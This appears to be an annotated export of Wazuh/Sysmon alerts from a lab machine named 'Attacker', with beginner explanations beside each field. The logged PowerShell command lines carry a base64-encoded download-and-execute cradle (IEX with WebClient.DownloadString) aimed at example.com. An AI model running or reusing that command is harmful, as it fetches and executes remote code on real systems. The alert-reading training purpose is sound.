data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:13.6116365Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284380 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:13.586
ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00}
ProcessId: 15472
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pfax4tpn.eqc.ps1
CreationUtcTime: 2025-04-24 22:38:13.586
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:13.586 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd54-680a-6c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15472 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pfax4tpn.eqc.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:13.586 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 67 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534299.1585257 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:16.7381749Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284469 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:15.366
ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00}
ProcessId: 15624
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00}
ParentProcessId: 15472
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:15.366 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd57-680a-6e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15472 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 71 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534299.1593328 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:16.9762322Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284470 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:16.919
ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00}
ProcessId: 15624
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zanwxrjo.ewu.ps1
CreationUtcTime: 2025-04-24 22:38:16.916
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:16.919 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd57-680a-6e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zanwxrjo.ewu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:16.916 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 68 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534300.1596097 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:18.9901696Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284498 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:17.923
ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00}
ProcessId: 15800
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00}
ParentProcessId: 15624
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:17.923 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd59-680a-700b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15800 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 72 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534301.1604168 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:19.2856439Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284499 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:19.204
ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00}
ProcessId: 15800
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tfqszefa.cbk.ps1
CreationUtcTime: 2025-04-24 22:38:19.204
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:19.204 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd59-680a-700b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15800 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tfqszefa.cbk.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:19.204 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 69 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534304.1606937 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
